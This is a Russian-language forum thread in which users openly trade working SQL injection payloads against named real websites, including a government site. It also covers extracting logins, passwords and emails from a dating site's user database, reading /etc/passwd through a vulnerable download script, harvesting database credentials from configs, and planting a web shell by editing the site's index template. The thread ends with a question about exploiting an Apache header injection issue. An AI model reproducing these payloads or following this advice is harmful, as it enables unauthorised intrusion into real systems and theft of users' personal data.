Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.
всем привет частенько сталкиваюсь с извлечением большого количество данных из баз данных. можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи? К примеру: Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью? Спасибо всем ответившим =)
.acme при обращении к скрипту http://www.rosprom.gov.ru/oorg.php в куки прописывай id=-999 union select 1,2,3,4,5/*
Indio какая СУБД интересует? MSSQL: select TOP n column from table where column>'чето' MYSQL: select column from table limit 20000,10 SYBASE: select TOP n START AT 20000 column from table PostgreSQL: select column from table LIMIT 10 OFFSET 20000
Со скулей походу ниче не вышло,аблом =_= Вот второй день уже маюсь,дошёл вот : http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(0x276C6F67696E27,0x27647470726F7065727469657327))-- Почему дальше не идёт,не ужели всего две таблицы ?))
Code: http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+1+table_name+from+information_schema.tables)))-- Code: http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+2+table_name+from+information_schema.tables)))-- меняй число после top во втором подзапросе (который внутри where+table_name+not+in)
Подскажите кто нибудь: Система UNIX. В httpd.conf прописано: <VirtualHost *> ServerAdmin [email protected] DocumentRoot /www/htdocs/rail ServerName www.site.com # ServerAlias 10.7.103.250 ServerAlias 10.7.100.4 ErrorLog /var/log/apache/railway.log CustomLog /var/log/apache/railway.log common </VirtualHost> Дальше нужно записать файл в директорию /www/htdocs/rail: www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+using+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/* Вроде записалось, проверяем: www.site.com/1.txt и нифига не получилось... Кто скажет почему???
нашел на сатйте бажный скрипт даунлоада фалов скачал /etc/passwd все прошло норм поробовал /etc/shadow а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???
На100ящий, скорее всего, просто нет прав на запись в корень. Ищи папки с правами на запись. Vid0k, не качал что там по ссылке, но предполагаю что тоже не хватает прав. На /etc/shadow права имеет только root, если систему ставили без кардинальных изменений
что можно еще попробовать нарыть уже скачал error_log httpd.conf httpd-autoindex.conf httpd-info.conf httpd-mpm.conf httpd-ssl.conf httpd-vhosts.conf ток ничо дельного не нашел ток юзерские диры пытался скачать конфиг phpmyadmin но не выходит пишет мол ошибка сам весь сайт на хтмл + пара скриптов на пхп версия phpmyadmin 2.11.4
уже нашел конфиги для db логин и пасс подошли к phpmyadmin права там урезаны пытался залить шелл через вывод таблицы в файл не дали) в админке сайта нету даже где залить файл попробую отредактировать шабон index может пропишу простейший шел а там уже посмотрю
Подскажите, что можно сделать в случае если, база данных 4.1.22-standard, установлен форум, но стандартный префикс в таблицах по идее изменен. Каким образом тогда можно узнать названия этого самого префикса, чтобы получить пароль админа? ---------------------------------- брут не предлогать-помоему это не реально
Unfiltered Header Injection in Apache Всем привет , сканернул сайт и нашёл крит уязвимость Unfiltered Header Injection in Apache This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+). Нашёл описание тут http://www.securityfocus.com/archive/1/433280 но так и не понял как ей пользоватся так же скрипт показывает <script>alert(39582,41865125)</script> : ( подскажите пожалуйста что и как ... ?